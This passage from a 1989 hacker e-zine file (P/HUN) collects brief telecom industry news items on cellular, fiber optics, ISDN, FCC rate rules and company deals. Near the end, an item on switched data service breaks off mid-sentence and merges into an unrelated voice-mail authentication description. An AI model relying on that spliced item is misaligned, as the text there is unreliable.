affiliates and now has 110 stations receiving its 24-hour



satellite service.







SATELLITES FLY FOR GERMAN TV:



   Highly competitive satellite and cable TV services are expected



to grow significantly during the next 2 years in West Germany,



according to Broadcasting magazine. West German private TV channel



RTL Plus, a satellite-to-cable service, is expected to expand its



market to 10 million viewers. U.S. firm Capital Cities/ABC has a



holding in Tele-Munchen, part owner of the Tele5 satellite



channel.







 SPECIAL PACKAGE ON PHONES:



 -------------------------



SERVICE COULD START IN A SNAP:



   Customers moving into new homes could start phone service



within minutes by dialing telephone responses to a series of



computer-voiced questions with a new service being tested by US



West Communications. Officials liken the change to the switch from



operator-assisted to direct-dial local calls in the 1920s or the



similar change in long-distance calls in the 1950s.







SERVICE COULD LINE THE WEST:



   If an upcoming test of do-it-yourself phone service works in



Bellingham, Wash., another 2-year test will be done on the same



service in a larger market, such as Denver. If that also goes



well, the entire US West market - 14 states - will get the new



system by the year 2000. Throughout the test, all customers still



will be able to use their telephones as they now do.







FEATURES ARE A BUTTON AWAY:



   US West customers with do-it-yourself service will be able to



start or stop telephone feature services at any time, including



such commonly used services as call forwarding and 3-telephone



conversations. These services already are available, but only by



calling US West sales representatives during daytime business



hours. The new system will allow changes to be made at any time.







-------------------------------------------------------------------------------



Feb. 24-26, 1989



CELLULAR SIGNAL GOES FARTHER:



   Pacific Telesis has installed antennas at both ends of an



Oakland, Calif.-area tunnel to carry signals from cellular car



telephones, reports Forbes magazine. Also: PacTel is using a solar



cell to power a repeater signal and extend coverage into Laguna



Canyon. Forbes says the developments are indications of coming



improvements in cellular transmissions.







THE AIRWAVES ARE CROWDED:



   The main problem for cellular phone users in large metropolitan



areas is the addition of new subscribers to already jammed



cellular systems, reports Forbes magazine. The FCC has allocated



only 437 channels of radio waves to each carrier. To add



customers, systems have been subdividing cells, with each cell



having low-power antennas that operate in limited boundaries.







SENDING COSTS WOULD BE HALVED:



   Digital cellular technology could solve the problem of cramped



airwaves for cellular telephone systems, reports Forbes magazine.



With digital, ordinary radio interference is eliminated,



conversations are private, data from laptop computers can be sent



to the office from the road. Also: Digital cellular would cost



about half the transmission price because it's twice as fast.







LOYOLA PLANS FOR ISDN USE:



   AT&T recently said that the Definity 75/85 communications



system will be the base for an Integrated Services Digital Network



that will carry voice, data and images for Loyola University.



Computerworld says Loyola is expected to be the first commercial



customer to use Definity. By early next year about 7,000 phones on



the 3 Chicago-area campuses will be on the system.







TELENET LINKS WITH STRATACOM:



   Telenet Communications has made an agreement with Stratacom



Inc. to develop the technology for what the companies said will be



the first broadband Integrated Services Digital Network service to



be based on the ISDN frame relay interface, reports Computerworld.



Telenet, a subsidiary of U.S. Sprint, will integrate packet



switches with Stratacom digital multiplexers.







THE PHONE IS IN THE BANK:



   Banks are playing it smart with their money and are winning



price concessions from telephone companies by pitting carriers



against one another, reports Network World. Some banks are



negotiating for new services; others are cutting costs by striking



custom contracts with local carriers. Example: Irving Trust of New



York used MCI and AT&T to get a new international calling service.







CIA HELP IS NO SECRET:



   The CIA linked its electronic-mail systems together with the



help of Soft-Switch, a company in Wayne, Pa., that specializes in



connecting multivendor E-mail systems, reports Government Computer



News. A key function of the software package: Directory services



that maintain information on all mail systems directly or



indirectly connected to the software.







FCC GETS COMPLAINT ON PACBELL:



   Conference-Call USA, based in Chicago, has filed a complaint



with the FCC, accusing Pacific Bell of refusing to change its



practice of automatically routing all conference-call traffic to



AT&T, reports CommunicationsWeek. The firm says the practice is



stunting the growth of competitive companies.







STUDENTS ARE ON THE PHONE:



   School children in Denver are using computers and transmission



facilities from US West Advanced Technologies to communicate with



teachers, special subject experts and other students.



CommunicationsWeek says the equipment will be given to the school



system at the end of the school year. US West is using information



gained from the trial to plan an information gateway in Omaha,



Neb.







HEARING IMPAIRED CAN MAKE CALLS:



   The State Relay Center is scheduled to begin service Friday in



Birmingham, Ala. The new relay center was created to link



hearing-impaired customers by teletype to people they want to



call. The service is funded by a small surcharge on all phone



bills in the state.







-------------------------------------------------------------------------------



Feb. 28, 1989



CALLERS MUST BE TOLD THE COST:



   The FCC yesterday ordered 5 companies that charge customers 20%



to 80% more than AT&T, MCI or Sprint to toe the line. The



alternative operators must now tell callers how much the call will



cost and which company is placing it before it goes through. The



high rates usually are placed on hotel, airport or hospital



phones. (From the USA TODAY News section.)







FIRMS GIVE A PART OF REVENUES:



   The phone companies told by the FCC yesterday to reveal costs:



Central Corp., International Telecharge Inc., National Telephone



Services Inc., Payline Systems Inc. and Telesphere Network Inc.



Right now all these companies buy phone time from a major carrier



such as AT&T and MCI and then give the hotel, airport or hospital



that uses the service a cut of revenues from every call.







CALLERS WILL GET MORE RIGHTS:



   The FCC said yesterday that alternative long-distance operators



must: Put a sticker on the phone with price information or tell



the caller the price verbally; give callers an chance to hang up



without any charge; offer callers a chance to go through AT&T or



another phone service. Right now many alternative operators stop



you from using another carrier.







NISSEI PLANS A FAX EXPANSION:



   Portable facsimile machine manufacturer Nissei says that a



major expansion of its operations will be completed within 2



months. To come: As many as 5 new fax machines, a revamping of the



field staff to cover all sales territories. Also: Vice President



John Haggerty says Nissei will move into other areas of the retail



information technology market.







BELL GOES TO COLLEGE:



   Bell Atlanticom Systems said yesterday it has signed a contract



with the College of William and Mary in Williamsburg, Va., for a



fully integrated voice and data communications system. The



campus-wide system will provide resale of communications services



to students, a management system, and a universal wiring plan to



provide voice and data transmission.







SYSTEM INCLUDES TRUNKS, LINES:



   The communications system obtained by the College of William



and Mary yesterday will provide 300 trunks, 3,800 faculty and



student lines, 150 voice/data faculty users and 1,050 host data



ports. It includes more than 5,000 inside wiring runs and several



miles of fiber optics. Also included: A 1,000-user Aspen Voice



Mail System and the Alex-IS Telecommunications Management System.







MESSAGES GO AROUND THE GLOBE:



   GE Information Services has announced a new capability of its



QUIK-COMM System (electronic mailbox service) which enables users



to send QUIK-COMM messages to facsimile machines throughout the



world. Receiving fax machines must be Group III facsimile



terminals that conform to CCITT standards. Recipients do not have



to be QUIK-COMM System subscribers to receive the fax document.







MCI GETS THE INSURANCE:



   Northwestern Mutual Life Insurance Co. said yesterday it has



selected MCI Communications to replace AT&T's data network with a



nationwide data communications network linking Northwestern



Mutual's Milwaukee-based home office with its remote general and



district agency offices. The 3-year, multimillion dollar agreement



will eventually link more than 200 agency offices.







BELLSOUTH GETS CLOSER TO EUROPE:



   BellSouth Corp. has signed a definitive agreement to purchase



Air Call Holdings' shares in Air Call Communications, providers of



cellular, paging and telephone answering and telemarketing



services in the United Kingdom, Ireland and continental Europe.



BellSouth provides mobile systems services in the USA, Argentina,



Australia, Ireland and Europe.







SYSTEM OFFERS NEW OPTIONS:



   New networking and programming capabilities for the McDonnell



Douglas REALITY Operating System are being scheduled for beta



testing at several customer sites, the company said yesterday.



Dubbed ROS 7.0, the system will offer capabilities previously



unavailable in PICK systems. Also: Data and processing can be



distributed transparent to users and, in cases, the programmer.



-------------------------------------------------------------------------------







                   P/HUN Issue #4, Volume 2: Phile 11 of 11



                   DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD



                       __________________________________



                      |                                 |



                      | P/HUN Telecom News/Advancements |



                      |            PART 2               |



                      |        By  DareDevil            |



                      |_________________________________|



















March 3-5, 1989



PHONE LINES ARE SIMILAR:



   The USA's major long distance phone services aren't that



different. A comparison of AT&T, MCI Communications Co. and Sprint



Communications Co. in the March Data Communications magazine



found, for instance: Calls placed over Sprint lines were slightly



louder than those placed over AT&T or MCI lines. All the calls,



however, could be heard clearly. (From the USA TODAY Money



section.)







SPRINT WAS MOST ACCURATE:



   A study by Data Communications magazine says AT&T connected its



calls more quickly than other carriers. On average, it took 9.8



seconds to connect an AT&T call; 12.9 seconds for Sprint; 13.7



seconds for MCI. Also: Sprint had the fewest foulups. Only 2.3% of



the calls on its lines failed to go through on the first try; 4.9%



for AT&T; and 7.3% for MCI.







CRITICAL FIRMS CALL SURVEY FAIR:



   When information was sent from one computer to another over



phone lines during a study by Data Communications magazine, AT&T



had the fewest glitches. Next best: Sprint, then MCI. The magazine



placed 150-180 calls over the trio's phone lines between 4 cities



last fall. Companies response: All had criticisms of the



comparison but, overall, said results appeared to be fair.







PHONE FIRM ELIMINATES CHEMICAL:



   AT&T says it's saving the ozone layer. The company says it has



developed a way to eliminate the chemical CFC-113 from a process



it uses to make electronic circuit boards. Scientists say the



chemical may damage the ozone layer of the earth's atmosphere,



which protects people from dangerous ultraviolet rays from the



sun. (From the USA TODAY Money section.)







SERVICE STOPPED IN CANADA:



   Bell Canada has decided to end its 976 phone service in all of



its service regions, Telecommunications magazine says. The firm



said significant increases in cost and an anticipated decline in



revenues as primary factors in making the decision. Bell Canada is



the nation's largest telecommunications operating company.







MCI FAX HAS SEVERAL FEATURES:



   MCI has moved fast on fax. Telecommunications magazine reports



that MCI has become the first long-distance company in the USA to



offer a dedicated network for domestic and international fax



transmissions. Called MCI FAX, the service will include management



information reports, customized dialing plans, credit card billing



and other features.







-------------------------------------------------------------------------------



March 8, 1989



PACBELL TRUNK FEES SHOOT HIGHER:



   Costs on Pacific Bell's Assured PBX Trunk Line Service have



jumped nearly 50%, according to Network World. The increase was



made after the California Public Utilities Commission approved a



PacBell plan to create a new trunk service and raise rates for



what was once the only grade of service available. One firm with



2,000 trunks will pay about $96,000 more per year.







BELL PUTS FIBER INTO LAUNCH:



   Southern Bell and Bell Communications Research engineers are



working with NASA to prepare for a high definition TV taping and



transmission of the launch of the space shuttle Discovery.



Broadcasting magazine says Southern Bell and Bellcore are handling



a live fiber-optic transmission of the launch. A temporary studio



has been built at Kennedy Space Center.







RATES WILL DROP IN ALABAMA:



   The Alabama State Public Service Commission said in Montgomery



yesterday that phone rates will soon drop in the state. Ordered:



South Central Bell must reduce rates by $9 million by April. Cuts:



25 cents off the monthly Touch-Tone service; the elimination of



the Touch-Tone installation fee.







SATELLITE FLIES FOR JAPAN:



   The next launch of Arianespace is scheduled for the end of



March. Using the ELA 1 launch complex, an Ariane 2 launch vehicle



will place into orbit the Swedish direct broadcasting and



communications satellite TELE-X. The group last Saturday launched



the first Japanese telecommunications satellite JCSAT 1 and the



first European meteorological satellite MOP 1.







OPTIONS ADDED TO VOICE LINE:



   VoiceCom Systems has added 3 new service options to its voice



messaging product line, extended its worldwide communications



network, and created a new business unit to develop and implement



custom voice response applications. VoiceCom also introduced Guest



Mailbox service, which allows VoiceCom customers to temporarily



assign special voice mailboxes to their customers and vendors.







MODEMS ARE SLEEK, SOPHISTICATED:



   Some modems are being marketed like sleek sports cars. General



DataComm Industries is touting 2 new leased-line modems for



9,600-bit-per-second data communications as "the perfect balance



of technology and style," CommunicationsWeek says. Also: The



company says they include "sophisticated features" in "small,



stylish enclosures."







RADIO TELESCOPES LOOK IN SPACE:



   112-foot-diameter and 210-foot-diameter radio telescopes in



NASA's Deep Space Network will be used in the search for



extraterrestrial intelligence in space. Located in the Mojave



Desert and Australia, the telescopes will survey the universe over



a wide radio frequency range and spot-check bands up to 25,000



megahertz for some signal that indicates intelligence.







RADIO WILL SEARCH SILENT VALLEY:



   NASA's radio network searching for intelligence in space will



cover at least 10,000 times more frequencies than all previous



surveys and be 300 times more sensitive. The search will hunt for



signals from stars similar to Earth's sun, up to 80 light years



from Earth. Of particular interest: The region from about 1,000



megahertz to 60,000 megahertz, the silent valley of frequencies.







PHONE WILL KEEP HER IN TOUCH:



   A telephone and computer electronic mail service will keep



Abigale K. Alling in touch with the world when she begins a 5-day



experiment today in the Arizona desert. She will enter a



20-foot-high, 23-foot-square test module through an air lock and



sever the umbilical cord with Earth. She will be cut off from



everything except sunlight and communication links with the



outside world.







-------------------------------------------------------------------------------



March 9, 1989



AT&T MAKES LINK, CHIP FOR JAPAN:



   AT&T announced 2 products yesterday for Japan: A high-speed,



fiber optic data link and an Integrated Services Digital Network



(ISDN) microchip. The microchip can work with a variety of



microprocessors and other ISDN chips. It will more easily allow



Japanese telephone users to have access to a digital network that



can provide data, voice, and image transmission on one phone line.







LINK WILL HAVE LAN, VIDEO USES:



   AT&T is developing the ODL 125-FC Lightwave Data Link to comply



with Japan's industry standard for fiber-optic connectors, AT&T



said yesterday. Comprised of a receiver and transmitter, it



converts electrical signals to optical signals for fiber optic



data transmission. Applications include fiber-optic,



token-passing-ring Local Area Networks, and transmission of



digitized video signals.







NEW WATS JOINS THE MARKET:



   Advanced Telecommunications has announced a new long distance



service, Standard PLUS WATS, designed for small business



customers. Standard PLUS WATS will benefit the business caller



whose monthly long distance bill exceeds $150, the company said.



Standard PLUS features volume discounts up to 21%, 6-second



incremental billing and free call detail.







CARRIER GROUP GIVES SUPPORT:



   The Signaling System 7 from CCITT has won the support of the



National Telecommunications Network. SS7 would let NTN provide



Integrated Services Digital Network services, calling card



services and advanced toll-free services, reports Network World.



The 18,000-route mile network has customers in 175 cities.







HUGHES OBTAINING NETWORK FIRM:



   Sytek Inc., a producer of local network equipment, is being



bought by Hughes Aircraft for an estimated $50 million, Network



World reports. The deal still needs SEC approval. Sytek products



include broadband, fiber-optic and twisted-pair versions of



Ethernet and token-ring networks. The acquisition has been



discussed for months.







TULSA METROLINK TO BE BOUGHT:



   Dallas-based Columbine Telenet has entered an agreement to



purchase Tulsa MetroLink from Public Service Co. of Oklahoma,



officials said yesterday. Tulsa MetroLink is a 110 mile digital



fiber optic communications system founded in 1984 by PSO to



provide for high speed data and voice transmission to meet



internal communications needs.







TULSA FIRM HAS LONGEST FIBER:



   Tulsa Metrolink, which is being purchased by Columbine Telenet,



includes the longest single span of fiber in the USA - 1,944 feet



across the Arkansas River. The network can carry more than 400



million bits of data each second and can handle 6,000 simultaneous



voice conversations. Laser beams translate data or voice signals



into on-off lights sent through glass fibers finer than human



hair.







CXR LINE TO CROSS INTO KOREA:



   CXR Telcom, worldwide supplier of systems for the



communications markets, has signed a 3-year licensing agreement



with Woojin Electronics and Telecommunications Ltd., of Seoul,



South Korea. Under the agreement, subject to Korean government



approval, Woojin will sell CXR's subscriber line test module to



the Korean authority for use in its new line of digital switches.







-------------------------------------------------------------------------------



March 10-12, 1989



SPRINT SIGNS ATLANTIC DEAL:



   Cable & Wireless and US Sprint Thursday announced that US



Sprint will acquire the USA end of the PTAT transatlantic



fiber-optic cable system. Also: The 2 companies have formed an



alliance to jointly develop advanced global telecommunication



services. PTAT is the first privately built transatlantic



fiber-optic cable. It will link the USA and Britain. (From the USA



TODAY Money section.)







SPRINT GETS HALF INTEREST:



   The alliance between US Sprint and Cable & Wireless will be



named GLOBAL FON. Also: US Sprint has agreed to acquire the



complete interest of the Washington-based Private Transatlantic



Telecommunications Systems in the PTAT transatlantic cable system.



The acquisition, which is subject to FCC approval, will give US



Sprint a 50% interest in PTAT along with Cable and Wireless.







NEW SERVICE OFFERS IVPN:



    Among the first services to be jointly developed by GLOBAL FON



by Cable & Wireless and US Sprint will be an international virtual



private network (IVPN) based on Sprint's VPN and a GLOBAL FONCARD



based on Sprint's travel service, the FONCARD. The alliance will



also develop international private line services offering



customers a variety of enhanced features and capabilities.







ARTEL SYSTEM TO SELL IN JAPAN:



   NKK Corp., one of Japan's largest industrial concerns with



annual revenues of $8 billion, will be licensed to manufacture and



sell Artel Communication's 100 Mbps fiber optic local area network



system, FiberWay, in Japan, the companies said Thursday. Also: NKK



becomes the authorized distributor for Artel's fiber optic video



and graphics transmission system products.







FLORIDA SITE PLUGGED INTO FIBER:



   The latest development in fiber optic technology is bringing



fiber to the home, Southern Bell says. Heathrow, a mixed use



development north of Orlando, Fla., is on the leading edge of



fiber-to-the-home efforts. At Heathrow, residents will receive



voice, data and video over the same fiber system. The system



points to the day when optical fiber will be possible over all



telephones.







AREA SET FOR VOICE-ONLY FIBER:



   The first widespread appearance of optical fiber to the home



will be traditional voice lines, Southern Bell says. The company



will begin using fiber for voice-only delivery later this year in



Governor's Island, north of Charlotte, N.C., and several other



locations. Studies show that fiber systems to carry voice to the



home will be more economical than copper by the early 1990s.







FIBER IS GOING SINGLE-MODE:



   Southern Bell uses fiber systems that operate at up to 1.2



billion digital bits a second on a single fiber (the equivalent of



more than 16,000 simultaneous voice conversations), the firm says.



Since 1985, most of the optical fiber placed in Southern Bell has



been single-mode, which has a thinner core than its multi-mode



counterpart, keeping lightwaves traveling in a straight path.







CHEVRON CHOOSES TELECOM SUPPLIER:



   Chevron Information Technology Co. (CITC) has selected Northern



Telecom as its sole supplier of telecommunications equipment,



company officials said Thursday. The $8.4 million dollar agreement



was reached in association with PacTel Meridian Systems, which



will provide the equipment and services to Chevron. Most of the



PBXs will be located in California, Louisiana and Texas.







SOFTWARE PROCESSES AND MONITORS:



   IBM has introduced 2 products to help customers better manage



and use telecommunications facilities. At $90,000, Network Call



Accounting can process call detail records from multiple voice



switches. Expenses can be charged to a department or an extension.



Voice Network Design is a software program that lets customers



monitor the cost-effectiveness of transmission facilities.







-------------------------------------------------------------------------------



March 15, 1989







SEARS STICKS WITH SPRINT:



   US Sprint has signed a multi-million dollar communications



services agreement with Sears Technology Services Inc., the



corporate information organization of Sears, Roebuck and Co. The



agreement extends and enhances an agreement previously reached



between Sears and US Sprint in 1986 and makes STS one of US



Sprint's largest users.







20,000 SEARS SITES COVERED:



   A new agreement with Sears Technology Services will make US



Sprint the primary carrier of interLATA long-distance services for



Sears. Specific terms of the contract were not disclosed. However,

|officials of both companies said US Sprint would link



approximately 20,000 Sears locations throughout the country. Most



US Sprint products and services are covered under the agreement.







DIGITAL SWITCHES GO TO CHINA:



   Ericsson has signed a general agreement with China for AXE



digital switching equipment expected to lead to contracts worth



$31 million in the first stage. The agreement was signed by



Ericsson Australia with the Ningbo Post and Telecommunications



Bureau and the Ningbo Telephone Co. Ericsson will supply 12



digital AXE switches, including local subscriber and trunk lines,



to Ningbo.







TELEPHONE AND TERMINAL LINKED:



   Digital Equipment and Northern Telecom yesterday unveiled new



communications capabilities to integrate voice and data



information resources at the desk top, linking the telephone and



the terminal as a single tool. Featured: When a customer



assistance representative answers the phone, pertinent information



concerning the caller can be automatically displayed on the



terminal.







ELECTRICAL PROBLEM FOUND:



   A potential electrical glitch on the shuttle Discovery poses no



danger to the crew but may force it to return a day early. The



crew successfully launched a a $100 million Tracking and Data



Relay Satellite into orbit Monday. The problem: High pressure in



one of 3 fuel cells - used to produce electricity. NASA decides



tomorrow when to end the mission. (From the USA TODAY News



section.)







CALLS MADE ON THE COMPUTER:



   An integrated message desk capability that automatically links



message taking to electronic mail or voice store and forward mail



is included in a new communications system from Digital Equipment



and Northern Telecom. Also included: Computer screen dialing that



enables a user to key in the name of the party to be called. It



can be used for office communications, telemarketing and other



calls.







BELLATRIX JOINS THE FIELD:



   Bellatrix Corp., a publicly owned company, said yesterday it



will enter the field of telecommunications through its wholly



owned subsidiary, Bellatrix Communications Inc. It will offer



turnkey 900 interactive data and information services, including



connection and termination. Bellatrix expects the services to be



operational in May.







CHINA GETS 8,000 NEW LINES:



   Northern Telecom put into service yesterday its first DMS-100



digital switching system in the People's Republic of China. The



system will provide 8,000 lines of telecommunications service to 3



cities in Jiangxi province, about 900 miles south of Beijing.



Features such as direct dial services will now be available to



local subscribers.







LARGEST SYSTEM SERVES PINGXIANG:



   The main Northern Telecom system that opened yesterday in China



consists of 6,000 telephone lines for subscribers in Pingxiang.



The Pingxiang system is part of a $6 million contract announced in



1987 through which Northern Telecom will supply its DMS-100 and



DMS-10, with a capacity of 10,000 lines, to the Jiangxi PTA for



telecommunications services in 4 Chinese cities.







PACTEL HEAD MADE A DIRECTOR:



   Sam Ginn, chairman and chief executive officer of Pacific



Telesis Group, has been elected a director of Transamerica Corp.,



it was announced yesterday. Ginn, 51, has been chairman and chief



executive officer of Pacific Telesis since April 1988. Previously



he held the position of president and chief operating officer.



Ginn began his business career in 1960 with AT&T.







-------------------------------------------------------------------------------



March 17-19, 1989







YELLOW PAGES ARE FOR NIGHT OWLS:



   Pacific Bell assembled a separate yellow page section of



businesses open after 6 p.m. The first one, due out this month in



San Jose, Calif., has 199 listings - everything from 24-hour



salons to an all-night notary public. Officials say this is a



first-of-its-kind listing to be included in telephone books in 29



California communities by May 1990.







-------------------------------------------------------------------------------



March 21, 1989







CORDLESS PHONES CALL POLICE:



   Some Cleveland, Ohio, residents with cordless phones are



alarmed to find police at their doors asking, "What's the



problem?" The problem: Cordless phones with weak batteries send



out pulses that sometimes automatically dial the emergency number



911. (From the USA TODAY News section.)







ALLTEL CLAIMS STAKE IN CELLULAR:



   ALLTEL Mobile Communications said yesterday that it has



completed its purchase of Kansas Cellular Telephone Co.'s 40%



interest in the Wichita, Kan., wireline cellular system. ALLTEL



Mobile will be a limited partner in the Wichita SMSA partnership.



Southwestern Bell Mobile Systems is the general partner and



operator of the system.







DIGITAL SYSTEM GOES VIA SW BELL:



   Southwestern Bell Telecom will distribute Northern Telecom's



Meridian Norstar digital key system, company officials announced



yesterday. Southwestern Bell Telecom will market the Meridian



Norstar in Missouri, Kansas, Oklahoma, Arkansas and Texas.



Meridian Norstar is a small business communications system which



offers voice and data communications capabilities.







GTE AWARDS RADIO CONTRACT:



   Ericsson Radar Electronics of Sweden has received a $55 million



contract from GTE Government Systems Corp. to deliver mobile



microwave radios to the corporation's Mobile Subscriber Equipment



Division in Taunton, Mass. Designated MF15, the 15 GHz



down-the-hill radios have a transmission capacity of 256 - 4096



kbit/s. They were developed by Ericsson and Marconi Italiana.







EXCHANGE TO CARRY ISDN CIRCUIT:



   Network Equipment Technologies Inc. said yesterday that its



Integrated Digital Network Exchange has become the first product



of its kind to be certified to carry an ISDN primary rate circuit



(23B plus D) between 2 Northern Telecom Meridian SL-1 private



branch exchanges. The announcement came after successful testing



conducted recently by Northern Telecom at its facility in Santa



Clara, Calif.







COMSAT TO DEVELOP NETWORK:



   COMSAT Corp.'s Systems Division has been awarded a $16.9



million contract by the Turkish Postal Telephone and Telegraph



agency to modernize U.S. military communications in the



Mediterranean area. Designed and funded by the U.S. Defense



Communications Agency, the 5-year program calls for COMSAT to



perform systems engineering and integration for a new digital



wideband satellite-based network.







SYSTEM TO REPLACE TURKEY SITES:



   A new COMSAT system known as "DMIP I" (DCA Mediterranean



Improvement Program Phase I) is the first of a series designed to



improve Mediterranean area U.S. military communications over the



next several years. Each of DMIP I's 6 Earth stations, located at



major U.S. defense installations throughout Turkey, will



eventually replace the antiquated troposcatter sites.







RURAL WISCONSIN WILL GET TDS:



   Telephone and Data Systems Inc. says that as a result of FCC



lotteries held this week it expects to have an interest in



cellular systems serving 2 Rural Service Areas in Wisconsin. The



systems will serve southwestern and central Wisconsin and the



major state highways to the west and southwest of Madison, Wis.







FIBER OPTICS HAVE MILITARY USE:



   The Communications Product Division of Microwave Modules and



Devices and Codenoll Technology have announced an agreement to



offer rugged and militarized versions of Codenoll's fiber optic



Ethernet Local Area Network products for military/federal Tempest



applications. It gives the firms rights to use and modify



Codenoll's designs according to military standards.







-------------------------------------------------------------------------------



March 31-April 2, 1989







LINES ARE PICTURE PERFECT:



   Telephone lines are being used to send images from electronic



still cameras to newspapers and companies. The camera captures



images on a tiny computer disk instead of film. A transmitter



sends the image over phone lines in 3 1/2 minutes or less. Once



received, the image can be stored on a disk or printed on paper.



(From the USA TODAY Money section.)







FRENCH LINE GOES SILENT:



   In operation only 3 months, the TAT-8 trans-Atlantic fiber



optic system reaching into France needed to be closed down last



week for repairs. Suspected cause: Trawling lines in the Atlantic.



During the restoration, the International Telecommunications



Satellite Organization carries the international traffic. TAT-8 is



owned by AT&T, France Telecom and British Telecom.







NYNEX SUPPORTS HIGH-SPEED DATA:



   NYNEX said Thursday that it supports proposed generic



requirements for a new high-speed data communications service.



Known as Switched Multimegabit Data Service, the system is



scheduled to be available as early as 1991. SMDS will interconnect



local area networks (LANs) by providing broadband transport across



a metropolitan area using public, packet-switched networks.







SYSTEM HAS POTENTIAL:



   Designed to make use of evolving metropolitan-area network



standards and technology, the new Switched Multimegabit Data



Service will provide customer voice commands or touchtone signals.







 When a user calls the TeleCenter, he or she is prompted to give a name and



password.  A voice entry feature searches its "user profile" records for a



voice pattern matching that of the caller.







 If the caller is identified as an authorized user, the caller's stored



templates are loaded, allowing the user to communicate with the voice mail



system entirely by voice.







-------------------------------------------------------------------------------





.

